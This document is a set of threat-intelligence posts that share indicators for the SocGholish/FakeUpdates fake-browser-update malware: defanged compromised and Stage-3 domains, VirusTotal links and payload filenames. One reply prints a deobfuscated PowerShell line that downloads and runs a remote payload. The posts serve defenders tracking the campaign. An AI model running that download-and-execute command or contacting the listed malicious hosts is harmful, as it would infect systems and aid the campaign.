Malware Brandon

1/X Here's some details on recent SOCGholish / FakeUpdates initial infections and the TDS (Keitaro?) that goes along with it. This loader uses compromised sites to display a fake "browser update" themed lure that, when clicked, downloads the malware.

New SocGholish / FakeUpdates Stage-3 domain of the day: * snap[.]promantree[.]com Stage-2 Script that calls it: virustotal.com/gui/file/868d2…

New SocGholish Stage-3 domain: * api-app[.]uppercrafteroom[.]com Being served up by previously seen Stage-2: * content-website-analytics[.]com/script[.]js

(4/4) You can find all of these and ones I've listed in the past on my GitHub: github.com/MalwareBrandon… #SocGholish

(3/4) • webdisk[.]housecleaninggrovecityohio[.]com •• virustotal.com/gui/file/40774… • support[.]grovecityelectrician[.]com

(1/4) Several new SocGholish Stage-3 domains from the past month or so, with their respective VT Stage-2 script when available: • webmail[.]drainbusters1[.]com •• virustotal.com/gui/file/83431… •• virustotal.com/gui/file/ce566… • cpanel[.]sbkollel[.]org •• virustotal.com/gui/file/abcfd…

5/5 A lot of newer compromised sites I'm seeing are skipping the old Stage-2 script and directly calling the Stage-3 domain. #SocGholish #FakeUpdates

4/X New file name for the Chrome Payload as well. Previous name: New Version (Click).js New name: Google Launcher.js Firefox and Edge filenames still seem the same: FF: MozillaUpdater.zip->Firefox.js Edge: <11 random alphanumeric chars>.js

1/X Several new SocGholish infrastructure (Stage-2 / Stage-3) domains added to the list from the past couple of months: github.com/MalwareBrandon…

- updates[.]highendmark[.]com - Stage-2 Script Calling this: virustotal.com/gui/file/f5866… - vps[.]denissalazar[.]com - Stage-2 Script Calling this: virustotal.com/gui/file/2083c… - devel[.]asurans[.]com - virustotal.com/gui/url/afa741…

Some new SocGholish Stage-3 domains observed in the last few days: - updates[.]highendmark[.]com - vps[.]denissalazar[.]com - devel[.]asurans[.]com Updated my list of infrastructure (Stage2 & Stage3) with some others seen in the past few months as well: github.com/MalwareBrandon…

@SecRiot Looks like the .js executes some slightly obfuscated Powershell; just some basic string replacement and decimal->char conversion. Deobfuscates to "iex curl -useb hxxp://naybvyzvemm[.]top/f22[.]svg" (defanged)

@SecRiot Looks like SocGholish. The compromised site reaches out to getmanyme[.]com/privacy/i18min[.]js which is the Stage-2, which reaches out to to the Stage-3 at static[.]twalls5280[.]com for some criteria checking and for the payload

What is this? app.any.run/tasks/a76fcbea… #socgholish #apt #rat #powershell #malware #javascript

Shout out to the following who have recently posted their analysis on #SocGholish and other #FakeUpdates threats in the past few weeks: @TRACLabs_ @RussianPanda9xx @threatinsight @Intel471Inc @GoogleCloudSec Hope this list helps some people out there with their own analysis.

Finally getting around to sharing the SocGholish infrastructure I've observed over the last year or two. Comprises of known initial Stage-2 and Stage-3 domains as well as the respective Stage-2 scripts found on VirusTotal. github.com/MalwareBrandon…

Mandiant's latest blog post in the "Finding Malware" series dives deep into Fake Browser Update Attacks! 👾 Learn how these attacks use social engineering to deliver malicious payloads like FAKEUPDATES, FAKESMUGGLES, and FAKETREFF. Read the full post: bit.ly/43hDJ83

@pancak3lullz @x3ph1 There's a few users on here that regularly post SmartapeSG IOCs but also @MonitorSG on infosec[.]exchange posts frequently about it as well if you want to get some more insight

@x3ph1 @Malware_Brandon it's #smartapesg